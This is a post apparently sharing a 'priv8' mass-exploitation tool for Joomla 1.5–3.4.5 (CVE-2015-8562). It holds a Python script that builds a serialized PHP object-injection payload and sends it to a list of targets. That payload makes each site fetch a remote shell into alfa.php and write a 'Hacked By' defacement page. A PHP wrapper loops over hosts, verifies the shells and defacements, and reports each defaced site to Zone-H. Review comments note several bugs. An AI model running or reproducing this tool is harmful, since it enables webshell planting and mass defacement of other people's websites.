[Python] Joomla RCE Auto Deface 1.5 - 3.4.5

Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE via the X-Forwarded-For header (CVE-2015-8562). Note that the Python code below actually delivers the payload in the User-Agent header, not X-Forwarded-For; the session-stored header value is what gets deserialized.

Today I will share the tool that was being passed around as "priv8" for Joomla 1.5 through 3.4.5; it is a wrapper around the original public PoC. Only the versions in that range are affected, and this material is for systems you are authorised to test.

Here is the Python exploit. Before running it, edit the payload string in the `pl = generate_payload(...)` line: replace `http://you shell link here.TXT` (which contains spaces and is not a valid URL as shipped) with the URL of your own shell hosted as a plain .txt file, and change `alfa.php` / `alfa.html` and the `Hacked By` marker (the scan loop greps for that exact marker) to your own names.
Code:
import requests #  easy_install requests
import sys
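# Target list: one entry per line.  The scan loop appends /alfa.html to each
# entry and hands it straight to requests, so entries need a scheme (requests
# rejects bare hosts).  Fail with a usage line instead of an IndexError when
# the argument is missing.
if len(sys.argv) < 2:
    sys.exit("usage: %s <targets.txt>" % sys.argv[0])
fil = open(sys.argv[1], "r")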

def get_url(url, user_agent):
    """Deliver *user_agent* (the serialized payload) to *url* in the User-Agent header.

    The first GET establishes a session and keeps its cookie; the following
    three identical GETs re-send the payload with that cookie, so the stored
    session data gets read back and the chain has a chance to fire.  Returns
    the body of the last response.

    NOTE(review): four requests per target, no timeout and no error handling,
    so an unresponsive host blocks the scan loop indefinitely; TLS
    verification is whatever the requests default is.  That the header value
    lands in the session is the exploit's premise -- it is not visible here.
    """
    headers = {
    'User-Agent': user_agent
    }
    # Session cookie from the first delivery, replayed below.
    cookies = requests.get(url,headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers,cookies=cookies)  
    return response.content
   
def php_str_noquotes(data):
    """Encode *data* as a PHP ``chr(N).chr(N)...`` expression.

    This lets the payload reach PHP's eval() without any quote characters,
    which would otherwise terminate the serialized string it is embedded in.
    An empty input yields an empty string.  NOTE(review): ord() is taken per
    character, so on Python 3 a code point above 255 does not map to a single
    PHP byte; the payloads used here are ASCII.
    """
    return ".".join("chr(%d)" % ord(ch) for ch in data)


def generate_payload(php_payload):
    """Build the serialized-object string injected through the User-Agent header.

    *php_payload* is PHP source.  It is wrapped as ``eval(chr(..)...)``, has
    ``;JFactory::getConfig();exit`` appended so the request ends cleanly, and
    is placed in the ``feed_url`` property of a SimplePie object whose
    ``cache_name_function`` is ``assert`` -- the gadget chain the public PoC
    uses.  The leading ``}__test|`` and the trailing four bytes (an invalid
    UTF-8 sequence) are taken from that PoC; NOTE(review): what they do
    happens server-side (session storage) and cannot be confirmed from this
    file.  The declared string length is ``len()`` of the ASCII payload.
    """
    wrapped = "eval({0})".format(php_str_noquotes(php_payload))
    injected = "{};JFactory::getConfig();exit".format(wrapped)
    head = (r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}'''
            r'''s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{'''
            r'''s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''')
    tail = (r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";'''
            r'''O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''')
    terminator = '\xf0\xfd\xfd\xfd'
    parts = [head, 's:%d:"%s"' % (len(injected), injected), tail, terminator]
    return "".join(parts)
# PHP that runs on the target once the chain fires (quoted away by
# generate_payload, so it may not contain quote characters that survive).
# It writes two files into $_SERVER['DOCUMENT_ROOT']: alfa.php, filled from the
# URL below -- fetched BY THE TARGET, so the URL must be a real one reachable
# from there (the placeholder contains spaces) and URL fopen must be allowed --
# and alfa.html carrying the marker the scan loop greps for.  The fopen()
# handles are never closed on the PHP side.  Edit the URL, both file names and
# the marker before use.
pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/alfa.php','w+'),file_get_contents('http://you shell link here.TXT')); fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/alfa.html','w+'),'Hacked By AlfabetoVirtual ');")
# Scan loop: deliver the payload to every target and record which ones now
# serve the marker page.  NOTE(review): this file is Python 2 (`print`
# statement).  Under Python 3, .content is bytes and the `in` test below
# raises TypeError -- which the bare except then discards, so every target
# would silently "fail".
for i in fil.readlines():
  try:
    i=i.strip()
    # Four GETs per target (see get_url); the last body is dumped to stdout.
    print get_url(i, pl)
    # Success check: fetch the marker page the payload wrote.  No timeout.
    lala=requests.get(i+"/alfa.html")
    if "Hacked By AlfabetoVirtual" in lala.content:
     z=open('Defaced-joomla-rce.txt','a')
     z.write(i+"/alfa.html\n")
     z.close()
  except:
    # Bare except: connection errors, bad URLs, KeyboardInterrupt and the
    # Python 3 TypeError above are all swallowed without a trace.
    pass
   
fil.close()

The second part is a PHP wrapper that re-sends the payload through curl and then auto-notifies Zone-H; the Zone-H name is hard-coded as `defacer=AlfabetoVirtual` in the POST body and must be changed. It shells out to `python rce.py` and expects that script to print the serialized payload on stdout, which the Python listing above does not do as written (it runs the whole scan itself).
PHP:
<?php
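// CLI wrapper: takes a target list (one bare host per line -- the scan loop
// prepends http:// itself) and drives the exploit through curl.
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
if(!isset($argv[1]))
{
   die("usage: $argv[0] list.txt");

}
$list=file($argv[1]);
// file() returns false (with a warning) on an unreadable path; count(false)
// is a TypeError on PHP 8 and would otherwise send a request to "http:///".
if($list===false)
{
   die("cannot read $argv[1]");
}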
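/**
 * Send one GET to $url carrying the payload in the User-Agent header.
 *
 * @param string $url    Target as listed (no scheme is added here; curl defaults it).
 * @param string $fields Unused; kept because every call site passes it.
 * @param string $ua     Value sent as User-Agent -- the serialized payload.
 * @return string|false  Raw response, headers included, or false if curl failed.
 *
 * Cookies persist in a single cookies.txt across every call and every
 * target, which is what lets the session created by one request be replayed
 * by the next.  NOTE(review): TLS verification is switched off so targets
 * with self-signed certificates still get hit, but anything on-path can then
 * impersonate a target; FOLLOWLOCATION also carries the jar to wherever a
 * redirect points.  Both are left as-is here.
 */
function send_request_cgi($url,$fields,$ua)
{
  $init=curl_init($url);
  curl_setopt($init,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($init,CURLOPT_COOKIEJAR,"cookies.txt");
  curl_setopt($init,CURLOPT_COOKIEFILE,"cookies.txt");
  curl_setopt($init,CURLOPT_HEADER,1);
  curl_setopt($init, CURLOPT_SSL_VERIFYHOST, false);
  curl_setopt($init, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($init,CURLOPT_FOLLOWLOCATION,1);
  curl_setopt($init,CURLOPT_TIMEOUT,3);
  curl_setopt($init,CURLOPT_CONNECTTIMEOUT,3);
  curl_setopt($init,CURLOPT_USERAGENT,$ua);
  $exe=curl_exec($init);
  // Release the handle; the original leaked one per call inside the scan loop.
  curl_close($init);
  return $exe;
}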
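  /**
   * Obtain the serialized payload by running the Python generator.
   *
   * @param string $header Unused -- every call site passes "RHION"; kept so
   *                       those call sites keep working.
   * @return string stdout of `python rce.py`, trimmed.
   *
   * NOTE(review): rce.py is expected to print the payload; the Python
   * listing above does not do that as written, so a print-only variant is
   * implied.  The command is re-run on every call -- four times per target.
   */
  function get_payload($header)
  {
    $ka=shell_exec("python rce.py");
    // shell_exec() yields null when the command fails or prints nothing; an
    // empty User-Agent would turn every delivery into a silent no-op, so stop.
    if($ka===null || trim($ka)==='')
    {
      die("rce.py produced no payload\n");
    }
    return trim($ka);
  }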
// Scan loop.  NOTE(review): entries are used as bare hosts here (curl gets
// $sites as-is and the checks below prepend http://), whereas the Python scan
// loop expects full URLs -- the two halves do not take the same list format.
for($i=0;$i<count($list);$i++)

{
$site[$i]=strtok($list[$i],"\r\n");
$sites=trim($site[$i]);
echo $sites."\n";
// Four deliveries per target, mirroring the four GETs in the Python get_url();
// each call re-runs `python rce.py` to obtain the same payload again.
$res=send_request_cgi($sites,"",get_payload("RHION"));
$res2=send_request_cgi($sites,"",get_payload("RHION"));
echo $res."\n".$res2;
$res=send_request_cgi($sites,"",get_payload("RHION"));
$res2=send_request_cgi($sites,"",get_payload("RHION"));
echo $res."\n".$res2;
// Success check 1: the dropped file answers and contains the author tag.
// file_get_contents() returns false on failure and preg_match() then simply
// does not match, so unreachable hosts are indistinguishable from misses.
$init1=file_get_contents("http://".$sites."/alfa.php");
if(preg_match("/AlfabetoVirtual/",$init1))

{
echo "SHELL: http://$sites/alfa.php\r\n";
$open=fopen("Defaced-joomla-rce.txt","a+");
fwrite($open,"http://$sites/alfa.php\r\n");
fclose($open);

}
// Success check 2: the marker page exists.
$init2=file_get_contents("http://$sites/alfa.html") ;
if(preg_match("/Hacked/i",$init2))

{
echo "$sites/alfa.html defaced\r\n";
// Handle from fopen() is never closed here (contrast with the block above).
fwrite(fopen("defaced-Final.txt","a+"),"$sites/alfa.html\r\n");
// zone-h
// NOTE(review): /OK/i matches any response that merely contains "ok"
// anywhere (e.g. inside the word "cookie"), so "zone-h ok" below is not a
// reliable confirmation.  The curl handle is also never closed.
$zone=curl_init("http://zone-h.org/notify/single");
curl_setopt($zone,CURLOPT_POST,1);
curl_setopt($zone,CURLOPT_POSTFIELDS,"defacer=AlfabetoVirtual&domain1=http://$sites/alfa.html&hackmode=1&reason=1");
curl_setopt($zone,CURLOPT_FOLLOWLOCATION,1);
$exez=curl_exec($zone);
if(preg_match("/OK/i",$exez))
  {
       echo $sites."/alfa.html zone-h ok :D\r\n";


}
else

{
echo $sites."/alfa.html zone-h error :(\r\n";
}
}
  }
?>
 
